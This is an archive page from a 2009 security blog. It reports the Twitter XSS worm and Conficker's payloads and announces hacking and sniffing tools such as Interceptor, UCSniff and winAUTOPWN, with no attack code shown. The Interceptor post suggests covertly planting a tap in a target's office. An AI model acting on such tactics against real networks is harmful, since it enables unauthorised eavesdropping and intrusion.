Archive | April, 2009

Twitter Battered By Powerful Worm Attacks

Your website & network are Hackable


We’ve written about Twitter quite a few times now, with it’s click-jacking vulnerability, twitter phishing attacks and various other issues.

It’s no surprise it’s being targeted though as it’s now the 3rd biggest social network after Facebook and Myspace.

Within a relatively short time period it’s overtaken almost everyone else. This weekend it suffered a fairly serious worm infection that spread itself through injecting JavaScript into people’s profile pages. After visiting an ‘infected’ profile you would then be infected and spread the worm from your profile page.

Twitter was hit over the weekend by powerful, self-replicating attacks that caused people to flood the micro-blogging site with tens of thousands of messages simply by viewing booby trapped user profiles.

The worm attacks began early Saturday morning and were the result of XSS, or cross-site scripting, bugs in the Twitter service. They caused those who viewed the profiles of infected users to post tweets promoting a site called StalkDaily.com. Victim profiles were then altered to include malicious javascript that infected new marks. Over the next 36 hours, at least three similar worms made the rounds, causing Twitter administrators to delete more than 10,000 tweets.

Twitter’s inability to quickly contain the mess prompted some security watchers to criticize Twitter for not being more on top of it. According to this postmortem from the Dcortesi blog, the attacks exploited gaping holes that allowed users to insert tags in the URLs of Twitter users’ profile pages that called malicious javascript from third-party web servers.

It’s not the first time Twitter has been hit and it’s not the first time they have been criticized for not being fast enough or for dealing with the problem properly.

The issue itself is quite a serious one and shouldn’t have existed in the first place, who knows how long this flaw has been known about and what nefarious purposes other people have been using it for.

The fella that exploited it basically did it to promote his own Twitter knock off called StalkDaily which is currently down.

As is frequently the case with XSS-based attacks, the worm was unable to prey on those using the NoScript add-on for the Firefox browser.

Twitter’s security team was able to block the attack for a while, but a new assault that made use of “mildly obfuscated” code soon defeated the countermeasure, raising the possibility that it was based on the detection of attack signatures rather than fixing the underlying bug that allowed the XSS vulnerability in the first place.

“The existence of a mildly obfuscated version authorizes a scary suspect: have Twitter guys just been trying to block the original strain by signature, rather than fixing their website error?” Italian researcher and NoScript creator Giorgio Maone wrote here. “This would be ridiculous, since any script kiddie can create his own slightly modified version for fun or profit (and is probably doing that).”

It’s not the first time Twitter has been slow to react to vulnerabilities on its site that allow self-replicating attacks against its users. The San Francisco-based company took more than 24 hours to close a separate hole discovered by white-hat hackers last month, while many of the company’s employees attended the South by South West conference in Austin, Texas.

The scary part is, Twitter didn’t fix the root cause of the problem – it appears they just filtered out the malicious code. So by altering it slightly the author quickly unleashed another version of the worm.

I hope Twitter get’s their act together and starts fixing things properly.

Source: The Register


Posted in: Exploits/Vulnerabilities, Web Hacking

Tags: , , , , , , , , , , ,

Posted in: Exploits/Vulnerabilities, Web Hacking | Add a Comment
Recent in Exploits/Vulnerabilities:
- Shadow Brokers NSA Hack Leaks 0-day Vulnerabilities
- Pompem – Exploit & Vulnerability Finder
- Bug Bounties Reaching $500,000 For iOS Exploits

Related Posts:

Most Read in Exploits/Vulnerabilities:
- Learn to use Metasploit – Tutorials, Docs & Videos - 235,432 views
- AJAX: Is your application secure enough? - 120,202 views
- eEye Launches 0-Day Exploit Tracker - 85,643 views

Malwarebytes Anti-Exploit Premium | 1 Year 1 PC for $24.95


Watcher – Passive Analysis Tool For HTTP Web Applications

Your website & network are Hackable


Watcher is a run time passive-analysis tool for HTTP-based Web applications. Watcher provides pen-testers hot-spot detection for vulnerabilities, developers quick sanity checks, and auditors PCI compliance auditing. It looks for issues related to mashups, user-controlled payloads, cookies, comments, HTTP headers, SSL, Flash, Silverlight, referrer leaks, information disclosure, Unicode, and more.

Major Features:

  1. Passive detection of security, privacy, and PCI compliance issues in HTTP, HTML, Javascript, and CSS
  2. Works seamlessly with complex Web 2.0 applications while you drive the Web browser
  3. Non-intrusive, will not raise alarms or damage production sites
  4. Real-time analysis and reporting – findings are reported as they’re found, exportable to XML
  5. Configurable domains with wildcard support
  6. Extensible framework for adding new checks

Watcher is built as a plugin for the Fiddler HTTP debugging proxy available at www.fiddlertool.com. Watcher works seamlessly with today’s complex Web 2.0 applications by running silently in the background while you drive your browser and interact with the Web-application.

Watcher is built in C# as a small framework with 30+ checks already included. It’s built so that new checks can be easily created to perform custom audits specific to your organizational policies, or to perform more general-purpose security assessments.

You can download Watcher here:

Watcher.zip

Or read more here.


Posted in: Hacking Tools, Web Hacking

Tags: , , , , , , ,

Posted in: Hacking Tools, Web Hacking | Add a Comment
Recent in Hacking Tools:
- PowerOPS – PowerShell Runspace Portable Post Exploitation Tool
- Shadow Brokers NSA Hack Leaks 0-day Vulnerabilities
- UFONet – Open Redirect DDoS Tool

Related Posts:

Most Read in Hacking Tools:
- Top 15 Security/Hacking Tools & Utilities - 1,987,206 views
- Brutus Password Cracker – Download brutus-aet2.zip AET2 - 1,456,996 views
- wwwhack 1.9 – Download wwwhack19.zip Web Hacking Tool - 684,173 views

Malwarebytes Anti-Exploit Premium | 1 Year 1 PC for $24.95


Conficker Finally Awakes & Dumps Payload

Find your website's Achilles' Heel


So it seems something big was brewing with Conficker, they just didn’t want to do what everyone expected and unleash it on April 1st when all eyes were on them.

Smart move really, they kept quiet and waited a week or so after before dropping some fairly serious and complex payloads (encrypted rootkits).

It seems like they are going for the old ransom tactic and duping users into buying dodgy anti-virus software.

An updated version of the Conficker worm is installing malware that attempts to lure people into buying rogue anti-virus software. Security researchers also say the worm is downloading malware tied to the notorious Waledac botnet.

Conficker’s latest move may be tied to a scheme to lure users into downloading fake anti-virus software.

Security researchers monitoring the Conficker worm’s activities say the malware has been observed downloading a file detected by Kaspersky Lab as FraudTool.Win32.SpywareProtect2009.s.

“Once it’s run, you see the app interface, which naturally asks if you want to remove the threats it’s ‘detected,'” wrote Aleks Gostev on Kaspersky Lab’s Analyst’s Diary blog. “Of course, this service comes at a price—$49.95.”

There is also some links to Waledac a supposed next-gen botnet for spamming purposes that came shortly after the demise of Storm.

It seems like Conficker is not going to be laying dormant any more, perhaps they weren’t making enough from renting out sections to spammers and DDoSers – now they really want to monetize the infected machines they have gathered.

In addition to that file, the worm is also now downloading the Waledac malware, which steals passwords and turns computers into bots for spamming operations. Waledac has emerged as a key part of spamming operations over the past several months, and is widely considered a reincarnation of the infamous Storm botnet.

“Fear is used, universally, as a means to control people,” said Sendio CTO Tal Golan. “Governments use it. Large businesses use it. So it should come as no surprise to anyone that ‘cyber-bad guys’ use it.”

At the moment, the rogue anti-virus software comes from sites located in the Ukraine (131-3.elaninet.com.78.26.179.107) although the worm is downloading it from other sites, according to Kaspersky Lab.

Unsurprisingly the source for much of the rogue software is in Eastern Europe, a hotspot for cybercrime and hackers skilled in malware and cryptography.

There’s some updates from F-Secure here:

New Conficker action

Source: eWeek


Posted in: Exploits/Vulnerabilities, General Hacking, Malware

Tags: , , , , , , , ,

Posted in: Exploits/Vulnerabilities, General Hacking, Malware | Add a Comment
Recent in Exploits/Vulnerabilities:
- Shadow Brokers NSA Hack Leaks 0-day Vulnerabilities
- Pompem – Exploit & Vulnerability Finder
- Bug Bounties Reaching $500,000 For iOS Exploits

Related Posts:

Most Read in Exploits/Vulnerabilities:
- Learn to use Metasploit – Tutorials, Docs & Videos - 235,432 views
- AJAX: Is your application secure enough? - 120,202 views
- eEye Launches 0-Day Exploit Tracker - 85,643 views

Malwarebytes Anti-Exploit Premium | 1 Year 1 PC for $24.95


Interceptor – Wireless Wired Network Tap (Fon+)

Find your website's Achilles' Heel


The Interceptor is a wireless wired network tap. Basically, a network tap is a way to listen in to network traffic as it flows past. Most tools are designed to pass a copy of the traffic onto a specified wired interface which is then plugged into a machine to allow a user to monitor the traffic. The problem with this is that you have to be able to route the data from that wired port to your monitoring machine either through a direct cable or through an existing network. The direct cable method means your monitor has to be near by the location you want to tap, the network routing means you have to somehow encapsulate the data to get it across the network without it being affected on route.

The Interceptor does away with the wired monitor port and instead spits out the traffic over wireless meaning the listener can be anywhere they can make a wireless connection to the device. As the data is encrypted (actually, double encrypted, see how it works) the person placing the tap doesn’t have to worry about unauthorized users seeing the traffic.

Requirements

This project has been built and tested on a Fon+ but should in theory work on any device which will run OpenWrt and has at least a pair of wired interfaces and a wireless one

This isn’t intended to be a permanent, in-situ device. It is designed for short term trouble shooting or information gathering on low usage networks, as such, it will work well between a printer and a switch but not between a switch and a router. Here are some possible situations for use:

  • Penetration testing – If you can gain physical access to a targets office drop the device between the office printer and switch then sit in the carpark and collect a copy of all documents printed. Or, get an appointment to see a boss and when he leaves the room to get you a drink, drop it on his computer. The relative low cost of the Fon+ means the device can almost be considered disposable and if branded with the right stickers most users wouldn’t think about an extra small box on the network.
  • Troubleshooting – For sys-admins who want to monitor an area of network from the comfort of their desks, just put it in place and fire up your wireless.
  • IDS – If you want to see what traffic is being generated from a PC without interfering with the PC simply add the Interceptor and sit back and watch. As the traffic is cloned to a virtual interface on your monitoring machine you can use any existing tools to scan the data.

You can download Interceptor here:

interceptor_1.0.tar.bz2

Or read more here.


Posted in: Hacking Tools, Network Hacking

Tags: , , , , , , , , ,

Posted in: Hacking Tools, Network Hacking | Add a Comment
Recent in Hacking Tools:
- PowerOPS – PowerShell Runspace Portable Post Exploitation Tool
- Shadow Brokers NSA Hack Leaks 0-day Vulnerabilities
- UFONet – Open Redirect DDoS Tool

Related Posts:

Most Read in Hacking Tools:
- Top 15 Security/Hacking Tools & Utilities - 1,987,206 views
- Brutus Password Cracker – Download brutus-aet2.zip AET2 - 1,456,996 views
- wwwhack 1.9 – Download wwwhack19.zip Web Hacking Tool - 684,173 views

Malwarebytes Anti-Exploit Premium | 1 Year 1 PC for $24.95


Microsoft Puts Hold on Forefront Security Product Range

Your website & network are Hackable


Microsoft is in the news again, but this time for holding back on something security related.

It seems like they want to have some extra time for development, and well perhaps some business related factors come into play too.

A lot of Windows networks use ISA (as it used to be called) – in the future it’ll be known as Threat Management Gateway. It shows they are moving away from plain old “Firewall” kind of software and more into security intelligence.

Microsoft will delay the release of the next version of its Forefront security product range.

The company’s announcement of the delay suggests it wants to improve the technology, but business reasons provide a more plausible – though unproven – rationale for the postponement.

Instead of shipping the product release, codenamed Stirling, in the first half of 2009, Redmond now expects to put it out around the turn of the year or even later.

Forefront Server Security for Exchange (messaging security) and Threat Management Gateway (the next version of what used to be called ISAS, Microsoft’s enterprise firewall and caching software) are now expected to arrive in Q4 2009.

Management console and Forefront Security for SharePoint (portal security) are penciled in for arrival only in the first half of 2010. Forefront Client Security 2.0 (endpoint security – anti-malware and firewall – for corporate PCs) has also been delayed till the first half of next year.

It seems like the whole suite has been put on hold for quite some time, with most products looking to come out Q4 2009 or more likely everything will his the streets in Q1-2 2010.

I don’t have much experience with any of these as I stopped using Microsoft products in a corporate environment quite some time back.

Anyone have any thoughts?

In a posting on the Forefront security blog, Microsoft said the delay was needed to add improved behaviour-based anti-malware protection and to improve integration with third-party security applications. The security giant expects to ship a second beta of Stirling and a release candidate prior to the final release.

Microsoft said its behaviour-based anti-malware protection, which it calls Dynamic Signature Service, will help “deliver more comprehensive endpoint protection for zero day attacks” by complementing existing “advanced heuristics, dynamic translation and real time application scanning for kernel level malware with a sophisticated approach to on-demand threat mitigation”.

We’re not exactly sure what that means either.

Our guess is that Microsoft is actually pushing back the enterprise security release to coincide with the availability of Windows 7 and changes to how it supplies security software to consumers. Back in November, Microsoft announced plans to discontinue its Windows Live OneCare consumer security service from the end of June in favour of a free consumer product, codenamed Morro, currently under development.

They are claiming to be developing technology that can detect 0-day exploits, well that’s how it reads to me. Unless they can beat the heuristic engines that most modern anti-virus software uses (unsuccessfully I might add) they are going to be out of luck.

It could just be a move to synchronise the development with the release of the much awaiting Windows 7. Let’s hope for everyone’s sake it’s an altogether more secure product.

Source: The Register


Posted in: Countermeasures, Security Software

Tags: , , , , , , , , , , ,

Posted in: Countermeasures, Security Software | Add a Comment
Recent in Countermeasures:
- An Introduction To Web Application Security Systems
- OpenIOC – Sharing Threat Intelligence
- Cuckoo Sandbox – Automated Malware Analysis System

Related Posts:

Most Read in Countermeasures:
- AJAX: Is your application secure enough? - 120,202 views
- Password Hasher Firefox Extension - 117,856 views
- NDR or Backscatter Spam – How Non Delivery Reports Become a Nuisance - 57,742 views

Malwarebytes Anti-Exploit Premium | 1 Year 1 PC for $24.95


Webtunnel 0.0.5 Released – HTTP Encapsulation and Tunnel Tool

Your website & network are Hackable


Webtunnel is a network utility that encapsulates arbitrary data in HTTP and transmits it through a web server.

In that regard, it is similar to httptunnel, however, it has several key important differences: its server component runs in the context of a web server as a CGI application (with optional FastCGI support) so it does not need its own port, and supports most things that the web server supports, such as authentication, HTTP 1.1, HTTPS, and client certificates; it uses simple requests and responses so it works seamlessly through forward and reverse proxies; it is multi-threaded (actually multi-process using sockets for inter-process communication) to allow multiple parallel connections to multiple destinations simultaneously.

What’s New?

  • Added support for proxy auto-configuration
  • Fixed a bug that would cause a keep-alive timeout to stop the tunnel
  • Fixed a fork handling bug to support ActivePerl’s negative PIDs

You can download Webtunnel 0.0.5 here:

webtunnel-0.0.5.tgz

Or read more here.


Posted in: Hacking Tools, Network Hacking

Tags: , , , , , , ,

Posted in: Hacking Tools, Network Hacking | Add a Comment
Recent in Hacking Tools:
- PowerOPS – PowerShell Runspace Portable Post Exploitation Tool
- Shadow Brokers NSA Hack Leaks 0-day Vulnerabilities
- UFONet – Open Redirect DDoS Tool

Related Posts:

Most Read in Hacking Tools:
- Top 15 Security/Hacking Tools & Utilities - 1,987,206 views
- Brutus Password Cracker – Download brutus-aet2.zip AET2 - 1,456,996 views
- wwwhack 1.9 – Download wwwhack19.zip Web Hacking Tool - 684,173 views

Malwarebytes Anti-Exploit Premium | 1 Year 1 PC for $24.95


How to Scan for Conficker Worm

Find your website's Achilles' Heel


A bit of an update to the conficker worm that is supposedly scheduled for new updates and instructions today wednesday 1st. April 2009 and that nobody except for the bad guys knows what those instructions would be. Fyodor has rolled out a new nmap beta release to the nmap scripting engine that enables it to check if a particular machine is possibly infected by the conficker worm.

Thanks to excellent research by Tillmann Werner and Felix Leder of The Honeynet Project and implementation work by Ron Bowes, David Fifield, Brandon Enright, and Fyodor, we’ve rolled out a new Nmap release which can remotely scan for and detect infected machines. Nmap 4.85BETA5 is now available from the download page, including official binaries for Windows and Mac OS X. To scan for Conficker, use a command such as:


A clean machine should report at the bottom: “Conficker: Likely CLEAN”, while likely infected machines say: “Conficker: Likely INFECTED”.

A useful feature to check your own network if any of your computers in the network is infected by the conficker worm.

Tenable security have also released a new Nessus plugin #36036

which performs a network based check for Windows computers infected with a variant of the Conficker virus. The scan does not need credentials, but does require ports 445 or 139 to be open between the Nessus scanner and your scanned systems. The plugin is based on research from the University of Bonn in Germany.

Conficker exploits Windows systems vulnerable to MS08-067. Tenable has worked with many organizations to help them perform both un-credentialed network scans and credentialed patch audits with Nessus to find systems that are still vulnerable.

Source: insecure.org and tenablesecurity.com.


Posted in: Countermeasures, Malware

Tags: , , , , , , , , , , , , ,

Posted in: Countermeasures, Malware | Add a Comment
Recent in Countermeasures:
- An Introduction To Web Application Security Systems
- OpenIOC – Sharing Threat Intelligence
- Cuckoo Sandbox – Automated Malware Analysis System

Related Posts:

Most Read in Countermeasures:
- AJAX: Is your application secure enough? - 120,202 views
- Password Hasher Firefox Extension - 117,856 views
- NDR or Backscatter Spam – How Non Delivery Reports Become a Nuisance - 57,742 views

Malwarebytes Anti-Exploit Premium | 1 Year 1 PC for $24.95


UCSniff – VoIP/IP Video Sniffing Tool

Find your website's Achilles' Heel


UCSniff is an exciting new VoIP Security Assessment tool that leverages existing open source software into several useful features, allowing VoIP owners and security professionals to rapidly test for the threat of unauthorized VoIP and Video Eavesdropping. Written in C, and initially released for Linux systems, the software is freely available for anyone to download, under the GPLv3 license. Some useful features of UCSniff that have been combined together into a single package:

  • Allows targeting of VoIP Users based on Corporate Directory and/or extensions
  • Support for automatically recording private IP video conversations
  • Automatically re-creates and saves entire voice conversations to a single file that can be played back by media players
  • Support for G.722 and G.711 u-law compression codecs
  • Support for H.264 Video codec
  • Automated VLAN Hop and Discovery support
  • A UC Sniffer (VoIP and Video) combined with a MitM re-direction tool
  • Monitor Mode
  • Sniffs entire conversation if only one phone is in source VLAN

UCSniff was created as a Proof of Concept demonstration tool and a method of creating awareness around VoIP/UC threats. It can be used by VoIP/UC Administrators to test their own VoIP Infrastructure in a pilot before vulnerabilities are rolled into production. It can also be used by security professionals as a method of convincing IT decision makers that security best practices should be applied to VoIP/UC in the same way that they are applied to other TCP/IP based, client-server applications.

You can download UCSniff here:

ucsniff-2.00.tar.gz

Or read more here.


Posted in: Hacking Tools, Network Hacking, Privacy

Tags: , , , , , , , , , , , , , ,

Posted in: Hacking Tools, Network Hacking, Privacy | Add a Comment
Recent in Hacking Tools:
- PowerOPS – PowerShell Runspace Portable Post Exploitation Tool
- Shadow Brokers NSA Hack Leaks 0-day Vulnerabilities
- UFONet – Open Redirect DDoS Tool

Related Posts:

Most Read in Hacking Tools:
- Top 15 Security/Hacking Tools & Utilities - 1,987,206 views
- Brutus Password Cracker – Download brutus-aet2.zip AET2 - 1,456,996 views
- wwwhack 1.9 – Download wwwhack19.zip Web Hacking Tool - 684,173 views

Malwarebytes Anti-Exploit Premium | 1 Year 1 PC for $24.95


Conficker Day – April 1st – Uneventful

Your website & network are Hackable


So the big Conficker scare of April 1st has passed without any real events, no major sites taken down, no major online terror campaigns spawned.

Just a new more sophisticated, harder to stop version of Conficker updating from a longer list of domains.

It seems like this malware might be here to stay and infecting more and more computers building a formidable network of zombies.

April 1 has come and gone in some parts of the world, and the Conficker worm is still here. While the day in security passed by relatively uneventfully, there are still people at risk.

The doomsday some were predicting the Conficker worm to bring had not materialized as of the evening of April 1. But that hardly means Conficker is a bust.

In short, the Conficker worm did what was expected—generate 50,000 domain names and begin contacting them. According to BKIS, the Bach Khoa Internetwork Security center, 1.1 million PCs in Europe, Asia and a part of America infected with Conficker have already “called home.”

But even though nothing dramatic happened, AVG Technologies Chief Research Officer Roger Thompson warned against blowing the worm off.

It seems like the confirmed infection rate is sitting at just above 1 million, far less than the previously estimated 9 million.

But still 1 million is a formidable arsenal of spam sending machines, or a deadly DDoS network.

There is also the possibility of selling Conficker’s army of infected computers, but that could prove problematic due to the amount of attention it generated. Right now, countless members of the security community, including the Conficker Cabal—formally known as the Conficker Working Group—are keeping tabs on the worm. Even with 50,000 domains in question, those domains are being closely monitored and any malicious servers will likely be noticed before long.

“Given the profile of Conficker, I think it’s rather unlikely that the botnet is up for sale,” said Roel Schouwenberg, senior anti-virus researcher at Kaspersky Lab Americas. “Not a lot of people out there would like to handle such hot property, as the botnet is being watched by a lot of people. However, leasing [parts of] the botnet is a different story. That way the leasers would get the advantage of the power of the botnet, but the owners would still be running the risk.”

I think the assumption is fine, they won’t plan on selling the botnet – they will just keep increasing its size and potential and then lease out chunks of it for DDoS attacks and sending spam e-mails.

All this dodgy stuff is big business now, and sadly there doesn’t seem to be anything we can do about it.

Of course we can personally make sure no-one we know gets infected with Conficker, and if they do we can clean it up. But other than that, just observe the fun right?

Source: eWeek


Posted in: General News, Malware

Tags: , , , , , , ,

Posted in: General News, Malware | Add a Comment
Recent in General News:
- Teen Accused Of Hacking School To Change Grades
- Google’s Chrome Apps – Are They Worth The Risk?
- Twitter Breach Leaks 250,000 User E-mails & Passwords

Related Posts:

Most Read in General News:
- Hacking Still Can’t Outdo Stupidity for Data Leaks - 125,427 views
- eEye Launches 0-Day Exploit Tracker - 85,643 views
- Seattle Computer Security Expert Turns Tables On The Police - 44,176 views

Malwarebytes Anti-Exploit Premium | 1 Year 1 PC for $24.95


winAUTOPWN – Windows Autohacking Tool

Find your website's Achilles' Heel


winAUTOPWN is a TooL to Autohack your targets with least possible interaction. The aim of creating winAUTOPWN is not to compete with already existing commercial frameworks like Core Impact (Pro), Immunity Canvas, Metasploit Framework (freeware), etc. which offer autohacks, but to create a free, quick, standalone application which is easy to use and doesn’t require a lot of support of other dependencies.

Also not forgetting that winAUTOPWN unlike other frameworks maintains the original exploit writer’s source code intact just as it was and uses it. This way the exploit writer’s credit and originality is maintained. The source is modified only when required to enable a missing feature or to remove hard-coded limitations. Under these circumstances also, the exploit writers credits remain intact.

Newer exploit modules are added as and when they release and older ones are also being daily added.
Binaries of perl, php, python and cygwin DLLs (included) are required to exist either in a common folder or should be properly installed with their paths registered for those exploits which are cannot be compiled into a PE-exe.

Features :

  • Contains already custom-compiled executables of famous and effective exploits alongwith a few original modified exploits.
  • No need to debug, script or compile the source codes.
  • Scans all ports 1 – 65535 after taking the IP address and tries all possible exploits according to the list of discovered open ports (OpenPorts.TXT)
  • PortScan is multi-threaded.
  • Doesn’t require any Database like (PostGres,MySQL,etc.) at the back-end
  • Can be also be used to test effectiveness of IDS/IPS
  • Launched exploits are independent and doesn’t rely on service fingerprinting (to avoid evasion, if any)
  • Requires presence of php, perl and python with registeredpaths in Environment variables.

winAUTOPWN is updated almost daily. A separate DragonflyBSD-server is being set up which will hold the exploit repository and the next version will autosync the exploits from them in the appropriate folder.

You can download winAUTOPWN here:

winAUTOPWN.RAR

Or read more here.


Posted in: Exploits/Vulnerabilities, Hacking Tools, Windows Hacking

Tags: , , , , , ,

Posted in: Exploits/Vulnerabilities, Hacking Tools, Windows Hacking | Add a Comment
Recent in Exploits/Vulnerabilities:
- Shadow Brokers NSA Hack Leaks 0-day Vulnerabilities
- Pompem – Exploit & Vulnerability Finder
- Bug Bounties Reaching $500,000 For iOS Exploits

Related Posts:

Most Read in Exploits/Vulnerabilities:
- Learn to use Metasploit – Tutorials, Docs & Videos - 235,432 views
- AJAX: Is your application secure enough? - 120,202 views
- eEye Launches 0-Day Exploit Tracker - 85,643 views

Malwarebytes Anti-Exploit Premium | 1 Year 1 PC for $24.95